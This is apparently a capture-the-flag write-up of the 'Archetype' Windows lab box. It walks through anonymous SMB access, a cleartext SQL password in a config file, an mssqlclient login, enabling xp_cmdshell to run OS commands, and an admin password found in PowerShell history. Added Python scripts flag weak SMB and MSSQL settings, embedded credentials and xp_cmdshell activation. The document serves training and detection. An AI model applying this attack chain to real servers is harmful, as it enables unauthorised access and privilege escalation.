Archetype

Personal Rating: Very Easy

Enumeration

A first nmap scan reveals a few interesting ports and shows it's a Windows machine:

sudo nmap -A <IP>

PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: ARCHETYPE
|   NetBIOS_Domain_Name: ARCHETYPE
|   NetBIOS_Computer_Name: ARCHETYPE
|   DNS_Domain_Name: Archetype
|   DNS_Computer_Name: Archetype
|_  Product_Version: 10.0.17763
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

| ms-sql-info: 
|   10.10.10.27:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-os-discovery: 
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-05-03T10:30:50-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-05-03T17:30:51
|_  start_date: N/A
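The scan above already tells a defender most of what needs fixing on this host: guest sessions are accepted, SMB signing is disabled (SMB1) or not required (SMB2), and the SQL Server build is an unpatched RTM. The following script is an added example written for this writeup (it is not part of the original post or of nmap): it parses the indented `| script:` blocks of nmap's normal output into nested dicts and then evaluates those settings. The function names `parse_nse_output` and `weak_settings` are my own; the embedded sample is a trimmed copy of the scan output shown above.

```python
"""Parse nmap NSE script output and flag weak SMB / MSSQL settings."""
import re

# Trimmed copy of the scan output from this writeup (lines as nmap printed them).
SCAN_OUTPUT = """
| ms-sql-info:
|   10.10.10.27:1433:
|     Version:
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-os-discovery:
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|_  System time: 2021-05-03T10:30:50-07:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
"""

# Matches "key: value", or "key:" alone (which opens a nested block).
# Lines without a colon are free text and fail to match.
KV_RE = re.compile(r"^(?P<key>.*?):(?: (?P<value>.*))?$")


def parse_nse_output(text):
    """Turn nmap's indented "| ..." script lines into nested dicts."""
    root = {}
    stack = [(-1, root)]  # (indent of the block's header line, container dict)
    for raw in text.splitlines():
        if not raw.startswith("|"):
            continue
        body = raw[2:]  # drop the "| " or "|_" prefix
        if not body.strip():
            continue
        indent = len(body) - len(body.lstrip(" "))
        line = body.strip()
        # Close every nested block that is at least as deep as this line.
        while stack[-1][0] >= indent:
            stack.pop()
        container = stack[-1][1]
        m = KV_RE.match(line)
        if m and m.group("value") is not None:
            container[m.group("key")] = m.group("value").strip()
        elif m:
            child = {}
            container[m.group("key")] = child
            stack.append((indent, child))
        else:
            container.setdefault("_text", []).append(line)
    return root


def weak_settings(parsed):
    """Return human-readable findings for settings a defender should fix."""
    findings = []
    smb1 = parsed.get("smb-security-mode", {})
    if smb1.get("account_used") == "guest":
        findings.append("SMB accepts guest (anonymous) sessions")
    if smb1.get("message_signing", "").startswith("disabled"):
        findings.append("SMB1 message signing disabled")
    for dialect, info in parsed.get("smb2-security-mode", {}).items():
        notes = info.get("_text", []) if isinstance(info, dict) else []
        if any("not required" in n for n in notes):
            findings.append(f"SMB2 {dialect} signing not required")
    for instance, info in parsed.get("ms-sql-info", {}).items():
        version = info.get("Version", {}) if isinstance(info, dict) else {}
        if version.get("Post-SP patches applied") == "false":
            product = version.get("Product", "?")
            findings.append(f"MSSQL {instance} ({product}) has no post-release patches applied")
    return findings


if __name__ == "__main__":
    for finding in weak_settings(parse_nse_output(SCAN_OUTPUT)):
        print("[!]", finding)
```

The parser relies only on nmap's two-space indentation and the `|`/`|_` gutter, so it works on any NSE block, not just the SMB and MSSQL scripts shown here; feed it the saved `-oN` output of a scan and extend `weak_settings` with the checks that matter for your environment.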

Pillaging and SQL Access

With smbclient I could log in anonymously and fetch this config file containing a password:

smbclient -N \\\\10.10.10.27\\backups\\
smb: \> get prod.dtsConfig
<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>
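The real finding here is not the open share but the SSIS package configuration that stores a SQL login in clear text. As an added example for this writeup (not code from the original post), the script below scans a `.dtsConfig` file for `ConnectionString` properties that carry a `Password`/`Pwd` keyword and reports the account and data source with the secret redacted. The function names and the embedded sample file are my own; the sample mirrors the structure of `prod.dtsConfig` but uses placeholder values.

```python
"""Scan SSIS .dtsConfig files for credentials embedded in connection strings."""
import xml.etree.ElementTree as ET

# Connection-string keywords that carry a secret or identify the account.
# Assumption: the common OLE DB / SQLNCLI spellings; extend for other providers.
SECRET_KEYS = ("password", "pwd")
ACCOUNT_KEYS = ("user id", "uid")

# Constructed sample mirroring the layout of the file pulled from the backups
# share; the credential values are placeholders, not the ones from the box.
SAMPLE_DTSCONFIG = r"""<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="builder" GeneratedFromPackageName="Package" GeneratedFromPackageID="{00000000-0000-0000-0000-000000000000}" GeneratedDate="1.1.2019 00:00:00"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=EXAMPLE_SECRET;User ID=EXAMPLE\svc_account;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Source].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Integrated Security=SSPI;Initial Catalog=Staging;Provider=SQLNCLI10.1;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>
"""


def parse_connection_string(value):
    """Split 'Key=Value;Key=Value' into a dict with lower-cased keys."""
    pairs = {}
    for part in value.split(";"):
        if "=" not in part:
            continue
        key, _, val = part.partition("=")
        pairs[key.strip().lower()] = val.strip()
    return pairs


def redact(secret):
    """Keep only the length so a report does not re-expose the secret."""
    return "*" * len(secret)


def find_embedded_credentials(xml_text):
    """Return one finding per ConnectionString property that stores a password."""
    root = ET.fromstring(xml_text)
    findings = []
    for conf in root.iter("Configuration"):
        path = conf.get("Path", "")
        if not path.endswith(".Properties[ConnectionString]"):
            continue
        value_el = conf.find("ConfiguredValue")
        if value_el is None or not value_el.text:
            continue
        pairs = parse_connection_string(value_el.text)
        secret_key = next((k for k in SECRET_KEYS if k in pairs), None)
        if secret_key is None:
            continue  # e.g. Integrated Security=SSPI: no stored secret
        account = next((pairs[k] for k in ACCOUNT_KEYS if k in pairs), "<unknown>")
        findings.append({
            "path": path,
            "account": account,
            "data_source": pairs.get("data source", "<unknown>"),
            "secret_redacted": redact(pairs[secret_key]),
            # Persist Security Info=True lets the provider keep the password
            # readable after the connection opens; flag it alongside the secret.
            "persist_security_info": pairs.get("persist security info", "").lower() == "true",
        })
    return findings


if __name__ == "__main__":
    for f in find_embedded_credentials(SAMPLE_DTSCONFIG):
        print(f"{f['path']}: account={f['account']} source={f['data_source']} "
              f"password={f['secret_redacted']} persist={f['persist_security_info']}")
```

The source connection, which uses `Integrated Security=SSPI`, produces no finding; the destination connection does. Running this over every `.dtsConfig` and `.dtsx` on a file server or in a backups share is a cheap way to catch the pattern this box is built on.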

The password could be used to authenticate to the SQL Server as sql_svc:M3g4c0rp123:

python3 mssqlclient.py ARCHETYPE/sql_svc:M3g4c0rp123@10.10.10.27 -windows-auth

SQL OS Commands

In the SQL shell I could use the following commands to execute OS commands and read the user flag:

enable_xp_cmdshell
RECONFIGURE
xp_cmdshell type \Users\sql_svc\Desktop\user.txt
3e7b<SNIP>21a3
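Enabling xp_cmdshell is not silent: SQL Server writes a `Configuration option 'xp_cmdshell' changed from 0 to 1` message to its ERRORLOG, and with login auditing on, the preceding `Login succeeded for user ...` line on the same spid says who did it and from where. The script below is an added example written for this writeup (not part of the original post or of any SQL Server tooling); it scans ERRORLOG lines for that change and attributes it to the last login seen on the same spid. The function name, the `DANGEROUS_OPTIONS` set and the embedded log excerpt are my own; the excerpt is constructed, with placeholder timestamps and a placeholder client address, and follows the `<timestamp> <spid> <message>` layout of the real log.

```python
"""Detect xp_cmdshell (and similar) being switched on, from SQL Server ERRORLOG lines."""
import re

# Constructed ERRORLOG excerpt (not taken from the box). The message texts are
# the ones SQL Server emits for sp_configure changes and audited logins.
SAMPLE_ERRORLOG = r"""
2021-05-03 10:30:01.12 spid51      Login succeeded for user 'ARCHETYPE\sql_svc'. Connection made using Windows authentication. [CLIENT: 10.10.14.5]
2021-05-03 10:30:09.55 spid51      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2021-05-03 10:30:09.57 spid51      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2021-05-03 11:02:44.00 spid58      Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 10.0.0.20]
2021-05-03 11:02:50.31 spid58      Configuration option 'max server memory (MB)' changed from 2147483647 to 8192. Run the RECONFIGURE statement to install.
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+)\s+(?P<spid>\S+)\s+(?P<msg>.*)$"
)
CONFIG_RE = re.compile(
    r"Configuration option '(?P<opt>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)"
)
LOGIN_RE = re.compile(
    r"Login succeeded for user '(?P<user>[^']+)'.*\[CLIENT: (?P<client>[^\]]+)\]"
)

# sp_configure options that hand the SQL engine host-level execution.
# 'show advanced options' is a prerequisite rather than a capability, so it is
# not listed; the xp_cmdshell line right after it is the one worth paging on.
DANGEROUS_OPTIONS = {"xp_cmdshell", "Ole Automation Procedures", "clr enabled"}


def detect_dangerous_config_changes(log_text):
    """Return alerts for dangerous options being turned on, attributed by spid."""
    last_login = {}  # spid -> (user, client address) from the most recent login line
    alerts = []
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue
        ts, spid, msg = m.group("ts"), m.group("spid"), m.group("msg")
        login = LOGIN_RE.search(msg)
        if login:
            last_login[spid] = (login.group("user"), login.group("client"))
            continue
        change = CONFIG_RE.search(msg)
        if change and change.group("opt") in DANGEROUS_OPTIONS and change.group("new") != "0":
            user, client = last_login.get(spid, ("<unknown>", "<unknown>"))
            alerts.append({
                "time": ts,
                "spid": spid,
                "option": change.group("opt"),
                "user": user,
                "client": client,
            })
    return alerts


if __name__ == "__main__":
    for a in detect_dangerous_config_changes(SAMPLE_ERRORLOG):
        print(f"[ALERT] {a['time']} {a['option']} enabled on {a['spid']} by {a['user']} from {a['client']}")
```

On a default SQL Server 2017 instance the log lives under `MSSQL14.MSSQLSERVER\MSSQL\Log\ERRORLOG` (it rolls on restart, so check `ERRORLOG.1` and so on as well). The same state can be read live with `SELECT name, value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell'`; a value of 1 on a box that has no business running shell commands from SQL is the thing to investigate, regardless of whether the log line was seen.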

Further Pillaging

The admin password was stored in the PowerShell history, which could be found by running an enumeration script or by manual pillaging:

MEGACORP_4dm1n!!

From here, a tool like psexec or evil-winrm could be used to access the host and get the admin flag.

b91cc<SNIP>8528
